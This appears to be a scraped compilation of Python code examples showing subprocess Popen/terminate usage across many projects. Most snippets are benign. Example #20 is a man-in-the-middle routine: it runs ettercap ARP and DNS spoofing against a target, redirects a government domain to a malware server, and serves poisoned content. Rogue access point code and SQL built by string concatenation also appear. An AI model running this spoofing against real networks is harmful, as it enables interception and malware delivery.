Example #1
File: svn.py Project: jmesmon/layman
 def check_upgrade(self, target):
     '''Code to check the installed svn version and
     run "svn upgrade" if needed.'''
     file_to_run = _resolve_command(self.command(), self.output.error)[1]
     args = file_to_run + ' -q --version'
     pipe = Popen(args, shell=True, stdout=PIPE)
     if pipe:
         self.output.debug("SVN: check_upgrade()... have a valid pipe", 4)
         version = pipe.stdout.readline().strip('\n')
         self.output.debug("SVN: check_upgrade()... svn version found: %s"
             % version, 4)
         pipe.terminate()
         # Parse the version so the check is numeric; a plain string
         # comparison would order '1.10.0' before '1.7.0'.
         if tuple(int(n) for n in version.split('.')[:3]) >= (1, 7, 0):
             self.output.debug("SVN: check_upgrade()... svn upgrade maybe",
                 4)
             _path = path([target,'.svn/wc.db'])
             if not os.path.exists(_path):
                 self.output.info("An svn upgrade needs to be run...",
                     2)
                 args = ["upgrade"]
                 return self.run_command(self.command(), args,
                     cwd=target, cmd="svn upgrade")
             return
     else:
         return
Example #2
    def abaqusProcess(self):

        cleardir('.', FILEPAT)
        if os.path.exists(ODBFILE):
            os.remove(ODBFILE)
        if os.path.exists(TARGETFILE):
            os.remove(TARGETFILE)
        self.optlogger.info('INPUT THE TEMPERATURE OF THE THREAD IS %s', self.currTem)
        self.optlogger.info('START COMPUTING THE PRESTRESS .....')
        self.changeINP(INPFILE)
        createOdb = Popen(self._scommand_inp, shell=True)
        self.pause(400)
        self.optlogger.info('TERMINATE PROCESS: %s', createOdb.pid)
        createOdb.terminate()
        fetchOdb = Popen(self._scommand_odb, shell=True)
        self.optlogger.info('FETCH PRESTRESS FROM DATABASE...')
        sleep(5)
        print('COMPLETED!')
        self.optlogger.info('TERMINATE PROCESS: %s', fetchOdb.pid)
        fetchOdb.terminate()
        with open(TARGETFILE, 'r+') as f:
            f_list = f.readlines()
            target = f_list[self._targetno - 1]
        print(target)
        outPres = float(target.split(': ')[-1])
        self.optlogger.info('THE OUTPUT OF THE PRESTRESS IS %s', outPres)
        return outPres
Example #3
 def __call__(self, cmd_name, cmd, args=(), cwd=None):
     # Make log files
     if cmd_name in self._names:
         raise ValueError('Command name {0} not unique'.format(cmd_name))
     self._names.append(cmd_name)
     if cwd is None:
         cwd = self.working_path
     cmd_out_path = pjoin(self.log_path, cmd_name)
     stdout_log = open(cmd_out_path + '.stdout', 'wt')
     stderr_log = open(cmd_out_path + '.stderr', 'wt')
     proc = None
     try:
         # Start subprocess
         cmd_str = self.cmd_str_maker(cmd, args)
         proc = Popen(cmd_str,
                     cwd = cwd,
                     stdout = stdout_log,
                     stderr = stderr_log,
                     shell = NEED_SHELL)
         # Execute
         retcode = proc.wait()
     finally:
         if proc is not None and proc.poll() is None: # in case we get killed
             proc.terminate()
         stdout_log.close()
         stderr_log.close()
     return retcode
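
The try/finally cleanup in Example #3 is the core pattern; a minimal standalone sketch of just that part (function and file names are hypothetical):

from subprocess import Popen

def run_logged(cmd, log_prefix):
    """Run cmd with stdout/stderr teed to log files; never leak the child."""
    proc = None
    with open(log_prefix + '.stdout', 'wt') as out_log, \
         open(log_prefix + '.stderr', 'wt') as err_log:
        try:
            proc = Popen(cmd, stdout=out_log, stderr=err_log)
            return proc.wait()
        finally:
            # If wait() was interrupted (e.g. KeyboardInterrupt), make sure
            # the child does not outlive us.
            if proc is not None and proc.poll() is None:
                proc.terminate()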
Example #4
class ProcessHostapd(QThread):
    statusAP_connected = pyqtSignal(object)
    def __init__(self,cmd):
        QThread.__init__(self)
        self.cmd = cmd
        self.process = None  # set in run(); checked by stop()

    def run(self):
        print 'Starting Thread:' + self.objectName()
        self.makeLogger()
        self.process = Popen(self.cmd,stdout=PIPE,stderr=STDOUT)
        for line in iter(self.process.stdout.readline, b''):
            #self.log_hostapd.info(line.rstrip())
            if self.objectName() == 'hostapd':
                if 'AP-STA-DISCONNECTED' in line.rstrip() or 'inactivity (timer DEAUTH/REMOVE)' in line.rstrip():
                    self.statusAP_connected.emit(line.split()[2])

    def makeLogger(self):
        setup_logger('hostapd', './Logs/AccessPoint/requestAP.log')
        self.log_hostapd = logging.getLogger('hostapd')

    def stop(self):
        print 'Stop thread:' + self.objectName()
        if self.process is not None:
            self.process.terminate()
            self.process = None
Example #5
 def outputPrestress(self):
     cleardir('.', FILEPAT)
     if os.path.exists(ODBFILE):
         os.remove(ODBFILE)
     if os.path.exists(TARGETFILE):
         os.remove(TARGETFILE)
     self.optlogger.info('INPUT THE TEMPERATURE OF THE THREAD IS %s', self.currentTems)
     self.optlogger.info('START COMPUTING THE PRESTRESS .....')
     file_change(INPFILE, self._linenos, self.currentTems)
     createOdb = Popen(self._command_inp, shell=True)
     self.pause(400)
     self.optlogger.info('TERMINATE PROCESS: %s', createOdb.pid)
     createOdb.terminate()
     fetchOdb = Popen(self._command_odb, shell=True)
     self.optlogger.info('FETCH PRESTRESS FROM DATABASE...')
     sleep(5)
     print('COMPLETED!')
     self.optlogger.info('TERMINATE PROCESS: %s', fetchOdb.pid)
     fetchOdb.terminate()
     with open(TARGETFILE, 'r+') as f:
         f_list = f.readlines()
         target = f_list[self._targetno-1]
     print(target)
     pat = re.compile(r'\[(.*?)\]', re.S)
     target_str = pat.search(target).groups()[0]
     outPrestress = [float(item)
                     for item in target_str.split(', ')]
     self.optlogger.info('THE OUTPUT OF MODEL IS %s', outPrestress)
     return outPrestress
Example #6
File: run_tests.py Project: flyx/gps-osx
def invoke(argv, valgrind=False):
  """Execute a process.

  Executes a new process using the given ARGV and returns a tuple containing
  the process exit code, standard output and error output.
  """

  ecode = None
  (stdout, stderr) = (None, None)
  if valgrind:
    argv = ['valgrind', '--leak-check=full', '--error-exitcode=1'] + argv
  # Runs the process.
  process = Popen(argv, stdout=PIPE, stderr=PIPE)
  # Wait for completion or for timeout.
  start = time.time()
  while time.time() - start < TIMEOUT:
    ecode = process.poll()
    if ecode is not None:
      break
    time.sleep(0.05)
  if ecode is not None:
    (stdout, stderr) = process.communicate()
  else:
    # The process has timed out, so we kill it.
    process.terminate()
  # ECODE is None if the process timed out.
  return (ecode, stdout, stderr)
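
On Python 3.3+ the same timeout-then-terminate behavior is available without a poll loop; a sketch under that assumption:

from subprocess import Popen, PIPE, TimeoutExpired

def invoke_with_timeout(argv, timeout):
    """Like invoke(), but relying on communicate()'s built-in timeout."""
    process = Popen(argv, stdout=PIPE, stderr=PIPE)
    try:
        stdout, stderr = process.communicate(timeout=timeout)
        return (process.returncode, stdout, stderr)
    except TimeoutExpired:
        process.terminate()
        process.communicate()  # reap the child and drain its pipes
        return (None, None, None)  # ecode None still signals a timeout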
Example #7
    def train(self, corpus, time_slices, mode='fit', model='fixed'):
        """
        Train DTM model using specified corpus and time slices.

        'mode' controls the mode of the model: 'fit' is for training, 'time' for
        analyzing documents through time according to a DTM, basically a held out set.

        'model' controls the choice of model. 'fixed' is for DIM and 'dtm' for DTM.

        """
        self.convert_input(corpus, time_slices)

        arguments = "--ntopics={p0} --model={mofrl}  --mode={p1} --initialize_lda={p2} --corpus_prefix={p3} --outname={p4} --alpha={p5}".format(
            p0=self.num_topics, mofrl=model, p1=mode, p2=self.initialize_lda, p3=self.fcorpus(), p4=self.foutname(), p5=self.alpha)

        params = "--lda_max_em_iter={p0} --lda_sequence_min_iter={p1}  --lda_sequence_max_iter={p2} --top_chain_var={p3} --rng_seed={p4} ".format(
            p0=self.lda_max_em_iter, p1=self.lda_sequence_min_iter, p2=self.lda_sequence_max_iter, p3=self.top_chain_var, p4=self.rng_seed)

        arguments = arguments + " " + params
        logger.info("training DTM with args %s" % arguments)
        try:
            p = Popen([self.dtm_path] + arguments.split(), stdout=PIPE, stderr=PIPE)
            p.communicate()
        except KeyboardInterrupt:
            p.terminate()
        self.em_steps = np.loadtxt(self.fem_steps())
        self.init_alpha = np.loadtxt(self.finit_alpha())
        self.init_beta = np.loadtxt(self.finit_beta())
        self.init_ss = np.loadtxt(self.flda_ss())

        self.lhood_ = np.loadtxt(self.fout_liklihoods())

        # document-topic proportions
        self.gamma_ = np.loadtxt(self.fout_gamma())
        # cast to correct shape, gamma[5,10] is the proportion of the 10th topic
        # in doc 5
        self.gamma_.shape = (self.lencorpus, self.num_topics)
        # normalize proportions
        self.gamma_ /= self.gamma_.sum(axis=1)[:, np.newaxis]

        self.lambda_ = np.zeros((self.num_topics, self.num_terms * len(self.time_slices)))
        self.obs_ = np.zeros((self.num_topics, self.num_terms * len(self.time_slices)))

        for t in range(self.num_topics):
            topic = "%03d" % t
            self.lambda_[t, :] = np.loadtxt(self.fout_prob().format(i=topic))
            self.obs_[t, :] = np.loadtxt(self.fout_observations().format(i=topic))
        # cast to correct shape, lambda[5,10,0] is the proportion of the 10th
        # topic in doc 5 at time 0
        self.lambda_.shape = (self.num_topics, self.num_terms, len(self.time_slices))
        self.obs_.shape = (self.num_topics, self.num_terms, len(self.time_slices))
        # extract document influence on topics for each time slice
        # influences_time[0] , influences at time 0
        if model == 'fixed':
            for k, t in enumerate(self.time_slices):
                stamp = "%03d" % k
                influence = np.loadtxt(self.fout_influence().format(i=stamp))
                influence.shape = (t, self.num_topics)
                # influence[2,5] influence of document 2 on topic 5
                self.influences_time.append(influence)
Example #8
  class Command(object):
    def __init__(self, cmd):
      self.cmd = cmd
      self.process = None
  
    def run(self, timeout):
      def target():
        logfile = None
        # NOTE: logfile_path is assumed to be a module-level global.
        if logfile_path is not None:
          logfile = open(logfile_path, 'a')
          self.process = Popen(shlex.split(self.cmd), stdout=logfile, stderr=logfile, universal_newlines=True)
        else:
          self.process = Popen(shlex.split(self.cmd), universal_newlines=True)
        result = self.process.wait()
        if logfile is not None:
          logfile.write('\r\n')
          logfile.flush()
          logfile.close()
  
      thread = threading.Thread(target=target)
      thread.start()

      result = None
      thread.join(timeout)
      if thread.is_alive():
        self.process.terminate()
        thread.join()
      else:
        result = self.process.returncode

      return result
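
A hypothetical use of the Command class above; run() returns None when the timeout fires and the process is terminated:

logfile_path = None  # the thread target reads this module-level name
cmd = Command('sleep 10')
result = cmd.run(timeout=2)
if result is None:
    print('command timed out and was terminated')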
Example #9
    def testBasic(self):
        iface = self.tap.name
        record = PacketRecord()

        # start capture
        process = Popen([APP, iface, CAPTURE_FILE], stdout=DEV_NULL, stderr=DEV_NULL)

        # send packets
        for i in range(PACKET_COUNT):
            packet = IP(dst="www.google.com")/ICMP()
            sendp(packet, iface=iface, verbose=False)
            record.add_sent(packet)

        # wait for stragglers
        time.sleep(1)

        # stop capture
        process.terminate()
        # hack: send one more packet to make sure capture closes immediately
        sendp(IP(), iface=iface, verbose=False)
        process.poll()

        # verify capture file
        for packet in rdpcap(CAPTURE_FILE):
            record.add_received(packet)
        self.assertTrue(record.verify())
Example #10
class Procserver:
    '''
    Launch a python process that reads from stdin and writes to stdout as a
    service.
    '''
    def __init__(self, proc_args):
        '''
        Initializes the process using its arguments.
        '''
        self.proc = Popen(proc_args, stdout=PIPE, stdin=PIPE)

    def __del__(self):
        '''
        Terminates the process.
        '''
        self.proc.terminate()

    def communicate(self, string):
        '''
        Writes string to the process's stdin and blocks till the process writes
        to its stdout. Returns the contents from the process's stdout.
        '''
        self.proc.stdin.write(string.strip()+'\n\n')
        self.proc.stdin.flush()  # make sure the request reaches the child
        out = ''
        while True:
            line = self.proc.stdout.readline()
            if not line.strip(): break
            out += line
        return out.strip()
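
A hypothetical round trip with Procserver, using `cat` as the child so each block is echoed back (Python 2 text pipes assumed, matching the str written to stdin):

server = Procserver(['cat'])        # cat echoes every input block
print(server.communicate('hello'))  # -> 'hello'
del server                          # __del__ terminates the child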
Example #11
    def testLocal(self):
        # note: ignore_zero_padding necessary until '0' padding simulation bug is resolved
        record = PacketRecord(ignore_zero_padding=True)

        # start capture
        process = Popen([CLIENT_APP, DFE_IP, DFE_NETMASK, '-l', CAPTURE_FILE], env=self.env, \
            stdout=DEV_NULL, stderr=DEV_NULL)
        self.processes.append(process)

        # send packets
        for i in range(PACKET_COUNT):
            packet = IP(dst='127.0.0.2')/ICMP()
            sendp(packet, iface=self.iface, verbose=False)
            record.add_sent(packet)

        # wait for stragglers
        time.sleep(1)

        # make sure still running
        process.poll()
        self.assertTrue(process.returncode is None)

        # stop capture
        process.terminate()
        # hack: send one more packet to make sure capture closes immediately
        sendp(IP(), iface=self.iface, verbose=False)
        process.wait()

        # verify capture CAPTURE_FILE
        for packet in rdpcap(CAPTURE_FILE):
            record.add_received(packet)
        self.assertTrue(record.verify())
Example #12
File: wordish.py Project: jdb/wordish
class CommandRunner ( object ):
    r""" Implements a python "context manager", when entering the
    context (the *with* block ), creates a shell in a subprocess,
    right before exiting the context (leaving the block or processing
    an exception), the shell is assured to be terminated.

    The call method takes a string meant to contain a shell command
    and sends it to the shell, which executes it. The call returns the
    output of the command.

    >>> with CommandRunner() as sh:
    ...    sh("echo coucou")
    ...    sh("a=$((1+1))")
    ...    sh("echo $a")
    ...
    coucou, 0
    0
    2, 0
    """
    separate_stderr = True

    def __enter__( self ):
        if CommandRunner.separate_stderr:
            self.terminator = '\necho "~$ $?" \n' + 'echo "~$ " >&2 \n' 
            self.shell = Popen( "/bin/bash", shell=True, 
                                stdin=PIPE, stdout=PIPE,stderr=PIPE, 
                                universal_newlines=True)
                                
            self.stdout = ShellSessionParser( self.shell.stdout )
            self.stderr = ShellSessionParser( self.shell.stderr ) 
        else:
            self.terminator = '\necho "~$ " \n' 
            self.shell = Popen( "sh", shell=True, 
                                stdin=PIPE, stdout=PIPE, stderr=STDOUT)

            self.stdout = ShellSessionParser( self.shell.stdout )
            self.stderr = None
        return self

    def __call__( self, cmd):
        r"""Appends the terminator to the command and sends it to the
        shell via stdin. Then stdout is read until a prompt following a
        linefeed; the prompt is suppressed and the tokens read are
        joined and returned as the output of the command."""

        self.shell.stdin.write( cmd + self.terminator )
        return CommandOutput( *self.read_output(), cmd=cmd )
 
    def read_output(self):
        
        out = self.stdout._takewhile( is_output=True )
        ret = int( self.stdout.tokens.next() )
        err = ( self.stderr._takewhile( True )
                if CommandRunner.separate_stderr else None )

        return out, err, ret

    def __exit__( self, *arg):
        self.shell.terminate()
        self.shell.wait()
Example #13
 def test_listen(self):
     # Start the listen command with a socket.
     listen_daemon = Popen(self.listen_args, stdout=PIPE, stderr=PIPE)
     # Wait a short while for the socket to be created.
     time.sleep(1)
     # Send command to and receive response from the listen command.
     # (Implicit string concatenation, no summing needed.)
     get_cmd = (b'{ "id": "0", "verb": "get",'
         b' "path": "/routes/route[addr=1.2.3.4]/port" }\n')
     sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
     try:
         sock.connect(SOCKET_PATH)
         sock.sendall(get_cmd)
         resp = str(sock.recv(200), ENC)
     finally:
         sock.close()
     status = json.loads(resp)['status']
     self.assertEqual(status, 'ok')
     # Terminate the listen command.
     listen_daemon.terminate()
     ret_code = listen_daemon.wait()
     if ret_code not in (0, -SIGTERM):
         print('Error terminating daemon:', listen_daemon.args)
         print('Exit code:', ret_code)
         print('STDOUT\n', str(listen_daemon.stdout.read(), ENC))
         print('STDERR\n', str(listen_daemon.stderr.read(), ENC))
     listen_daemon.stdout.close()
     listen_daemon.stderr.close()
     os.unlink(SOCKET_PATH)
Example #14
class StanfordAPI:
    """Used to initialize the Stanford POS tagger in servlet mode and then connect to it using a socket"""

    def __init__(self, path_to_model='commons/stanford_pos_tagger/english-bidirectional-distsim.tagger',
                 path_to_jar='commons/stanford_pos_tagger/stanford-postagger.jar', port=5000, buffer_size=4096):
        """Used to initialize the StanfordAPI object with the host, port and buffer"""
        self.host = socket.gethostname()
        self.port = port
        self.buffer = buffer_size
        self.process = Popen(
            ['java', '-mx4g', '-cp', path_to_jar, 'edu.stanford.nlp.tagger.maxent.MaxentTaggerServer',
             '-model', path_to_model, '-port', str(port), '-sentenceDeLimiter', 'newline'])
        time.sleep(5)

    def pos_tag(self, message):
        """Used to send requests to the socket"""
        s = socket.socket()
        s.connect((self.host, self.port))
        if message.strip() == '':
            s.close()
            return []
        s.send(to_ascii(message))
        data = s.recv(self.buffer)
        s.close()
        return [tuple(x.rsplit('_', 1)) for x in str(data).encode('ascii', 'ignore').strip().split()]

    def __del__(self):
        """ Terminating the process """
        self.process.terminate()
Example #15
    def execute_sequence(self, sequence):
        def purify_args(args):
            for rm_arg in ['-h, --hardware', ]:
                try:
                    args.remove(rm_arg)
                except ValueError:
                    pass
            for add_arg in ['--no-gui', '--server']:
                args.append(add_arg)
            return args

        while True:
            for command in sequence['sequence']:
                args = split(command['command'])
                cwd = join(realpath(dirname(__file__)), '..', command['dir'])
                args[0] = join(cwd, args[0])
                process = Popen(purify_args(args), cwd=cwd)
                print "Starting "+str(args)
                reason = self.wait(command['timeout'], command['interruptible'], process) # TODO interruptible raw_input in new_thread for 2.7, exec with timeout= for 3
                print "End:", reason
                if reason!='terminated':
                    process.terminate()  # SIGTERM
                    process.send_signal(SIGINT)
                    process.wait() # should poll() and kill() if it does not close?
            if not sequence['infinite']:
                break
Example #16
class Query1(unittest.TestCase):

  def setUp(self):
    md.kill_controllers()
    self.ctrl = Popen([md.CONTROLLER_PATH,
                          "--verbosity=DEBUG",
                          "--log=query1.log",
                          "--query1"],stdout=PIPE)
    self.mn = md.MininetRunner(md.TreeTopo(depth=1,fanout=2), self.ctrl)

  def tearDown(self):
    self.mn.destroy()

  def testQuery(self):
    src = self.mn.hosts[0]
    dst = self.mn.hosts[1]
    self.assertEqual(self.mn.ping(src, dst, 1, 5), 0)
    time.sleep(2) # let the query pickup the last pair
    self.ctrl.terminate()
    output = list(self.ctrl.stdout)
    # 2 for initial ARP and 10 from the pings
    m = re.match("Counter is: (\\d+)\n", output[-1])
    numPkts = int(m.group(1))
    if md.is_ipv6_enabled():
      self.assertIn(numPkts, range(18, 25))
    else:
      self.assertEqual(numPkts, 12)
Example #17
	def test_command_send(self):
		# START SMTPD
		tfile = tempfile.NamedTemporaryFile()
		tfile_name = tfile.name
		tfile.close()
		p1 = Popen(['./tests/smtp_server.py', tfile_name], stdin=PIPE)
		citems = self.get_testserver_config_scheme()
		proj_dir = self.mm_create_project('Test')
		config = SafeConfigParser()
		config.read(self.config_path)
		for item in citems:
			config.set('Mail', item[0], item[1])
		files = ['mail.txt', 'subject.txt', 'keys.csv', 'attachments.txt']
		self.create_with_sample_files("", proj_dir, files)
		config.write(open(self.config_path, 'w'))
		sys.stdin = x_in = StringIO('\n')
		sys.stdout = x_out = StringIO()
		m = MMailer()
		m.command_send(args=['mmailer', 'send'])
		sys.stdin = sys.__stdin__
		sys.stdout = sys.__stdout__
		p1.terminate()
		p1.wait()
		of = open('tests/samples/send_output.txt','r')
		sto_str = of.read()
		sto = sto_str.decode('UTF-8')
		# exclude first line from compare,
		# because the date changes each test run
		assert x_out.getvalue() == sto,"\n\n[%s]\n\n[%s]" \
				% (sto, x_out.getvalue())
		import filecmp
		assert filecmp.cmp(tfile_name, 'tests/samples/sended.txt')
Example #18
def rsync_file_and_update_info(user_id):
    f_pathes = os.listdir(os.path.join("/var/www/u/" , str(user_id), "tmp/"))
    conn = MySQLdb.connect()
    try:
        for f in f_pathes:
            get_info_sql = "".join(["select id from file_table where owner_id = ", str(user_id), " and file_name = ", f])
            o_cur = conn.cursor()
            o_cur.execute(get_info_sql)
            o_res = o_cur.fetchall()

            target_p = "".join(["slave_node:/home/file_sys/", str(user_id), "files/"])
            update_info_sql = "".join(["update file_table set file_path = '", target_p, "' where id = ", str(o_res[0][0])])
            pid = os.fork()
            if(0 == pid):
                p_rsync = Popen(["rsync", "-avz", f_pathes + os.sep + f, target_p], stdin = sys.stdin, stdout = sys.stdout, stderr = sys.stderr) 
                #p_rsync.communicate()
                p_rsync.terminate()
                os.kill(os.getpid(), signal.SIGHUP)
            else:
                o_cur.execute(update_info_sql)
                print >> IGNORE, commands.getoutput("rm -fR " + f)  
    except Exception as ex:
        print >> sys.stderr, str(ex) 
    finally:
        conn.close()
Example #19
class Process(object):

    def __init__(self, command_line, cwd='.'):
        self.command_line = command_line
        self.cwd = os.path.join(os.path.dirname(__file__), cwd)

    def start(self):
        args = shlex.split(self.command_line)
        self.proc = Popen(args, stdout=PIPE, stderr=STDOUT, cwd=self.cwd, close_fds=ON_POSIX, bufsize=1)
        self.q = Queue()
        t = Thread(target=enqueue_output, args=(self.proc.stdout, self.q))
        t.daemon = True
        t.start()
        return self

    def stop(self):
        self.proc.terminate()

    def read_lines(self, timeout=1000):
        block = True
        get_timeout = min(.1, timeout / 1000.0)
        stop = millis() + timeout
        while millis() < stop:
            try:
                line = self.q.get(block, timeout=get_timeout)
                yield line
            except Empty:
                if self.proc.poll() is not None:
                    break  # process died
            block = False # only block first time
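
Example #19 leans on several names it does not define (enqueue_output, millis, ON_POSIX, Queue, Empty, Thread); a plausible sketch of those helpers, stated as an assumption rather than the project's actual code:

import sys
import time
from Queue import Queue, Empty  # Python 2; on Python 3: from queue import Queue, Empty
from threading import Thread

ON_POSIX = 'posix' in sys.builtin_module_names

def enqueue_output(out, queue):
    # Forward each line of the child's stdout into the queue.
    for line in iter(out.readline, b''):
        queue.put(line)
    out.close()

def millis():
    # Wall-clock time in milliseconds.
    return int(round(time.time() * 1000))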
Example #20
def run(target, gateway, malware_server_address):
    #Configuration of /usr/share/ettercap/etter.dns etter.conf
    #On ubuntu 13.04 /etc/ettercap/etter.dns etter.conf
    input_stdin = Popen(split("echo pdns_spoof"), stdout=PIPE)
    ettercap = Popen(split('ettercap -i wlan0 -T -q -P autoadd -M ARP:remote /' + target + '/ /' + gateway + '/'), stdin=input_stdin.stdout)
    #ip_forward after ettercap may have set it to zero
    #ADD DNS etter.conf TO SERVER IN VIRTUALBOX, VIRTUALBOX INTERNAL NETWORK
    vbox0_address = netifaces.ifaddresses('vboxnet0')[netifaces.AF_INET][0]['addr']
    replaceAll('/etc/ettercap/etter.dns','*.buenosaires.gob.ar A IP','*.buenosaires.gob.ar A '+vbox0_address )
    replaceAll('/etc/ettercap/etter.dns','malware-test.no-ip.info A IP','malware-test.no-ip.info A '+malware_server_address)
    #getOriginalJStoPoison()
    server_address = ('0.0.0.0', 80)
    SocketServer.ForkingTCPServer.allow_reuse_address = True
    httpd = SocketServer.ForkingTCPServer(server_address, BAComoLLegoHTTPRequestHandler)
    #wait for ettercap to initialize and unset ip_forward
    time.sleep(5)
    Popen(split("iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE"), stdout=PIPE).wait()
    Popen(split("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE"), stdout=PIPE).wait()
    Popen(split("sysctl -w net.ipv4.ip_forward=1"), stdout=PIPE).wait()
    #Popen(split("sysctl -p /etc/sysctl.conf"), stdout=PIPE).wait()
    try:
        print('http server is running...')
        httpd.serve_forever()   
    except KeyboardInterrupt:
        print "Exiting"
        if os.path.exists('firstRun'):
            print "removing first run flag"
            os.remove('firstRun')
        replaceAll('/etc/ettercap/etter.dns','*.buenosaires.gob.ar A '+vbox0_address,'*.buenosaires.gob.ar A IP' )
        replaceAll('/etc/ettercap/etter.dns','malware-test.no-ip.info A '+malware_server_address,'malware-test.no-ip.info A IP')
        Popen(split("sudo iptables -t nat -D POSTROUTING -o wlan0 -j MASQUERADE"), stdout=PIPE)
        Popen(split("sudo iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE"), stdout=PIPE)
        ettercap.terminate()
Example #21
File: mtr-web.py Project: grantc/mtr-web
def mtr_socket(ws):
    request = json.loads(ws.receive())
    print 'received', request
    args = ['mtr', '-p', '-c', '300']
    if request.get('no_dns'):
        args.append('--no-dns')
    if request.get('protocol') == 'TCP':
        args.append('-T')
    elif request.get('protocol') == 'UDP':
        args.append('-u')
    if request.get('version') == '4':
        args.append('-4')
    elif request.get('version') == '6':
        args.append('-6')
    args.append(request.get('hostname'))
    mtr = Popen(args, stdout=PIPE, stderr=STDOUT)
    for line in mtr.stdout:
        try:
            data = [x if i == 1 else int(x) for (i, x) in enumerate(line.split())]
            data[2] = "%.2f%%" % (data[2] / 1000.)
        except ValueError:
            # probably an error from stderr
            data = line
        finally:
            try:
                ws.send(json.dumps(data))
            except:
                mtr.terminate()
                print 'disconnected'
Example #22
class NginxServer:

    def __init__(self, nginx_conf, check_url, temp_dir='.'):
        conf_path = path.join(temp_dir, 'nginx.conf')
        write_file(conf_path, nginx_conf)

        self._command = "nginx -c %s" % conf_path
        self._ngx_process = None
        self.check_url = check_url

    def start(self):
        self._ngx_process = Popen(shlex.split(self._command))

        try:  # sanity check
            resp = self._request_check_url()
        except ConnectionError as e:
            self.stop()
            raise e

        if resp.status_code != 200:
            raise IOError("Nginx returned %s for GET %s" % (resp.status_code, self.check_url))

    def stop(self):
        if self._ngx_process is None:
            return
        try:
            self._ngx_process.terminate()
            sleep(0.2)
        finally:
            # unconditionally follow up with SIGKILL to make sure it is gone
            os.kill(self._ngx_process.pid, 9)

    @retry(ConnectionError, tries=20, delay=0.1)
    def _request_check_url(self):
        return requests.get(self.check_url, verify=False)
Example #23
class RunServer(object):

    def __init__(self, instance_name, port):
        self.instance_name = instance_name
        self.port = port
        self.lan_ip = get_lan_ip()
        self.process = None
        self.out = None

    def start(self):
        self.stop()
        cmd = [sys.executable, 'manage_%s.py' % self.instance_name,
               'runserver', '--noreload', '--traceback', '0.0.0.0:%d' % self.port]
        self.process = Popen(cmd)
        sleep(3.0)
        if self.process.poll() is not None:
            self.stop()
            raise RunException(ugettext("Error to start!"))
        self.open_url()

    def open_url(self):
        webbrowser.open_new("http://%(ip)s:%(port)d" %
                            {'ip': self.lan_ip, 'port': self.port})

    def stop(self):
        if self.is_running():
            self.process.terminate()
        self.process = None
        self.out = None

    def is_running(self):
        return (self.process is not None) and (self.process.poll() is None)
Example #24
class CppSim(ProcessWorkerThread):

    def handle_eval(self, record):
        val = np.nan
        # Continuously check for new outputs from the subprocess
        self.process = Popen([path, array2str(record.params[0])],
                             stdout=PIPE, bufsize=1, universal_newlines=True)

        for line in self.process.stdout:
            try:
                val = float(line.strip())  # Try to parse output
                if val > 250.0:  # Terminate if too large
                    self.process.terminate()
                    self.finish_success(record, 250.0)
                    return
            except ValueError:  # If the output is nonsense we terminate
                logging.warning("Incorrect output")
                self.process.terminate()
                self.finish_cancelled(record)
                return
        self.process.wait()

        rc = self.process.poll()  # Check the return code
        if rc < 0 or np.isnan(val):
            logging.info("WARNING: Incorrect output or crashed evaluation")
            self.finish_cancelled(record)
        else:
            self.finish_success(record, val)
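
`path` and `array2str` in Example #24 come from the surrounding module; plausible stand-ins (assumptions for illustration, not the project's actual definitions):

import numpy as np

path = './cpp_simulator'  # hypothetical path to the simulator binary

def array2str(x):
    # Format a 1-D array as one space-separated argument string.
    return " ".join("%.6f" % v for v in np.ravel(x))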
Example #25
File: parser.py Project: johnliu/chimp
    def collect_events(self):
        on_posix = 'posix' in sys.builtin_module_names

        # Helper function for quickly reading raw output.
        def enqueue_output(out, queue):
            for l in iter(out.readline, ''):
                queue.put(l)

        p = Popen(['adb', 'shell', 'getevent', '-lt'], stdout=PIPE, bufsize=1, close_fds=on_posix)
        t = Thread(target=enqueue_output, args=(p.stdout, self.raw_data_queue))
        t.daemon = True
        t.start()

        try:
            # Process the events in this thread.
            print 'Processing android events from device:'
            self.previous_state = ui.device.dump()
            while True:
                try:
                    line = self.raw_data_queue.get_nowait().strip()
                    self.preprocess_line(line)
                except Empty:
                    # Ignore empty events, we're simply reading too quickly.
                    pass
        except KeyboardInterrupt:
            print 'Finished processing events from device.'
            p.terminate()
Example #26
File: serve.py Project: defrex/hs-mobile
class OnWriteHandler(pyinotify.ProcessEvent):
    def my_init(self):
        self.start_serve()
        self.last = None

    def start_serve(self):
        self.httpd = Popen(('python', '-m', 'SimpleHTTPServer', str(PORT)),
                           stdout=PIPE, cwd=SERVE)
        print 'Serving at http://0.0.0.0:%i' % PORT

    def stop_serve(self):
        self.httpd.terminate()
        self.httpd.wait()
        self.httpd = None
        print 'Server Terminated'

    def recompile(self):
        self.stop_serve()
        compile.main(args)
        self.start_serve()

    def process_IN_MODIFY(self, event):
        print event.maskname, event.name
        name, ext = event.name.split('.')
        if not (os.path.isfile(os.path.join(event.path, '%s.%s' % (name, 'soy')))
                and ext == 'js'):
            cur = '%s-%s' % (event.path, event.name)
            if self.last == cur:
                self.last = None
            else:
                self.last = cur
                self.recompile()
Example #27
class ProcessThread(threading.Thread):
    def __init__(self,cmd):
        threading.Thread.__init__(self)
        self.cmd = cmd
        self.process = None
        self.logger = False

    def run(self):
        print 'Starting Thread:' + self.name
        if self.name == 'Airbase-ng':
            setup_logger('airbase', './Logs/requestAP.log')
            log_airbase = logging.getLogger('airbase')
            log_airbase.info('---[ Start Airbase-ng '+asctime()+']---')
            log_airbase.info('-'*52)
            self.logger = True
        self.process = Popen(self.cmd,stdout=PIPE,stderr=STDOUT)
        for line in iter(self.process.stdout.readline, b''):
            if self.logger:
                if not search(Refactor.getHwAddr(Refactor.get_interfaces()['activated']),
                        str(line.rstrip()).lower()):
                    log_airbase.info(line.rstrip())
            print (line.rstrip())

    def stop(self):
        print 'Stop thread:' + self.name
        if self.process is not None:
            self.process.terminate()
            self.process = None
Example #28
class AbstractSubprocessClass(object):
    """
    Simple abstract wrapper class for commands that need to be
    called with Popen and communicate with them
    """

    def __init__(self, runnable, encoding="utf-8"):
        self._runnable = runnable
        self._encoding = encoding
        self._closed = True

    def start(self):
        # print self._runnable
        # print self.options
        # NOTE: subclasses are expected to provide self.options.
        self._process = Popen([self._runnable] + self.options, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        self._closed = False

    def stop(self):
        if not self._closed:
            # HACK: communicate() sometimes blocks here
            self._process.terminate()
        self._closed = True

    def __exit__(self, exc_type, exc_value, traceback):
        if not self._closed:
            self.stop()

    def __del__(self):
        if not self._closed:
            self.stop()
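
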